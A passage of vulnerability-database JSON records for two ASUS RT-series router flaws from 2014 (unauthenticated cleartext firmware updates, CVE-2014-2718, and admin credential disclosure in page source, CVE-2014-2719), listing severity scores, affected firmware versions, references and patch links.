            "id": "CNVD-2014-07699"
          },
          {
            "db": "BID",
            "id": "70791"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "David Longenecker",
        "sources": [
          {
            "db": "BID",
            "id": "70791"
          },
          {
            "db": "PACKETSTORM",
            "id": "128904"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          }
        ],
        "trust": 1.0
      },
      "cve": "CVE-2014-2718",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2014-2718",
                "impactScore": 6.9,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2014-07699",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 7.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-70657",
                "impactScore": 6.9,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:C/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-2718",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-2718",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-07699",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201410-1415",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-70657",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image. Supplementary information : CWE Vulnerability type by CWE-345: Insufficient Verification of Data Authenticity ( Inadequate verification of data reliability ) Has been identified. ASUS RT-Series Wireless Routers is a wireless router device. There is a middleman security bypass vulnerability in ASUS RT Series Wireless Routers. An attacker can exploit a vulnerability to bypass certain restrictions and obtain sensitive information. The following products are affected: ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. In short, the router downloads via clear-text a\nfile from http://dlcdnet.asus.com, parses it to determine the latest\nfirmware version, then downloads (again in the clear) a binary file\nmatching that version number from the same web site. No HTTP = no assurance\nthat the site on the other end is the legitimate ASUS web site, and no\nassurance that the firmware file and version lookup table have not been\nmodified in transit. \n\nIn the link below I describe the issue in detail, and demonstrate a proof\nof concept through which I successfully caused an RT-AC66R to \"upgrade\" to\nan older firmware with known vulnerabilities. In concept it should also be\npossible to deliver a fully custom malicious firmware in the same manner. \n\nThis applies to the RT-AC68U, RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R,\nRT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. It may also apply to the\nRT-N53, RT-N14U, RT-N16, and RT-N16R since they use the same firmware base\nbut a different sub-version. \n\nThis has been fixed as an undocumented feature of the 376 firmware branch\n(3.0.0.4.376.x). \n\nDetails and POC:\nhttp://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html\n\n-- \nRegards,\nDavid Longenecker\n@dnlongen\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-2718"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "db": "BID",
            "id": "70791"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "db": "PACKETSTORM",
            "id": "128904"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-70657",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-2718",
            "trust": 3.5
          },
          {
            "db": "BID",
            "id": "70791",
            "trust": 2.6
          },
          {
            "db": "PACKETSTORM",
            "id": "128904",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699",
            "trust": 0.6
          },
          {
            "db": "XF",
            "id": "98316",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-70657",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "db": "BID",
            "id": "70791"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "PACKETSTORM",
            "id": "128904"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "id": "VAR-201411-0483",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          }
        ],
        "trust": 1.3441403886666665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          }
        ]
      },
      "last_update_date": "2025-04-13T23:27:35.303000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.asus.com/jp/"
          },
          {
            "title": "Cellspot router firmware update information",
            "trust": 0.8,
            "url": "https://support.t-mobile.com/docs/DOC-21994"
          },
          {
            "title": "ASUS RT Series Wireless Routers patch for middleman security bypass vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/51508"
          },
          {
            "title": "FW_RT_AC68U_30043763715",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54536"
          },
          {
            "title": "FW_RT_AC68U_30043763626",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54537"
          },
          {
            "title": "FW_RT_AC68U_30043761663",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54538"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-345",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-Other",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://seclists.org/fulldisclosure/2014/oct/122"
          },
          {
            "trust": 2.3,
            "url": "http://www.securityfocus.com/bid/70791"
          },
          {
            "trust": 2.1,
            "url": "http://dnlongen.blogspot.com/2014/10/cve-2014-2718-asus-rt-mitm.html"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/128904/asus-router-man-in-the-middle.html"
          },
          {
            "trust": 1.1,
            "url": "https://support.t-mobile.com/docs/doc-21994"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2718"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2718"
          },
          {
            "trust": 0.8,
            "url": "http://dnlongen.blogspot.jp/2014/10/cve-2014-2718-asus-rt-mitm.html"
          },
          {
            "trust": 0.6,
            "url": "http://xforce.iss.net/xforce/xfdb/98316"
          },
          {
            "trust": 0.3,
            "url": "http://www.asus.com/"
          },
          {
            "trust": 0.1,
            "url": "http://dlcdnet.asus.com,"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2718"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "db": "BID",
            "id": "70791"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "PACKETSTORM",
            "id": "128904"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "db": "BID",
            "id": "70791"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "db": "PACKETSTORM",
            "id": "128904"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-10-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "date": "2014-11-04T00:00:00",
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "date": "2014-10-28T00:00:00",
            "db": "BID",
            "id": "70791"
          },
          {
            "date": "2014-11-07T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "date": "2014-10-29T12:11:11",
            "db": "PACKETSTORM",
            "id": "128904"
          },
          {
            "date": "2014-10-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          },
          {
            "date": "2014-11-04T22:55:06.417000",
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-10-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-07699"
          },
          {
            "date": "2017-08-29T00:00:00",
            "db": "VULHUB",
            "id": "VHN-70657"
          },
          {
            "date": "2014-10-28T00:00:00",
            "db": "BID",
            "id": "70791"
          },
          {
            "date": "2016-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          },
          {
            "date": "2014-11-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-2718"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-1415"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT Series router firmware arbitrary code execution vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-005239"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Design Error",
        "sources": [
          {
            "db": "BID",
            "id": "70791"
          }
        ],
        "trust": 0.3
      }
    }

    VAR-201404-0636

    Vulnerability from variot - Updated: 2025-04-13 23:05

    Advanced_System_Content.asp in the ASUS RT series routers with firmware before 3.0.0.4.374.5517, when an administrator session is active, allows remote authenticated users to obtain the administrator user name and password by reading the source code. ASUS RT-Series Wireless Routers is a wireless router device. ASUS RT-Series Wireless Routers 'Advanced_System_Content.asp' has an information disclosure vulnerability that allows an attacker to exploit a vulnerability to obtain sensitive information. ASUS RT-Series running firmware versions prior to 3.0.0.4.374.5517 are vulnerable

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0636",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.318"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.220"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.374_4887"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "1.0.1.8n"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.374.4755"
          },
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.370"
          },
          {
            "model": "rt-n14u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.356"
          },
          {
            "model": "rt-n10e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "2.0.0.25"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.260"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.9"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.260"
          },
          {
            "model": "rt-n14u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.322"
          },
          {
            "model": "tm-ac1900",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "t mobile",
            "version": "3.0.0.4.376_3169"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.260"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_4561"
          },
          {
            "model": "rt-n10e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "2.0.0.20"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.270"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.140"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.3.162"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "7.0.2.38b"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.334"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.3.108"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.3.178"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.342"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.3.134"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "7.0.1.21"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.7c"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "7.0.1.32"
          },
          {
            "model": "rt-n10e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "2.0.0.24"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.334"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.246"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.2.3"
          },
          {
            "model": "rt-n10e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "2.0.0.10"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.3.176"
          },
          {
            "model": "rt-n10e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "2.0.0.19"
          },
          {
            "model": "rt-n10e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "2.0.0.7"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.360"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.342"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.346"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.4o"
          },
          {
            "model": "rt-n10e",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "2.0.0.16"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.246"
          },
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.272"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.220"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.8j"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.354"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.7f"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "8.1.1.4"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.8l"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.4"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.354"
          },
          {
            "model": "rt-ac66u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-n10e",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-n14u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-n16",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-n56u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-n65u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-n66u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374.5517"
          },
          {
            "model": "rt-series wireless routers",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "asus",
            "version": "\u003c=3.0.0.4.374.5517"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:asus:rt-ac68u",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac68u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n10e_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n14u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n16_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n65u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n66u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          }
        ]
      },
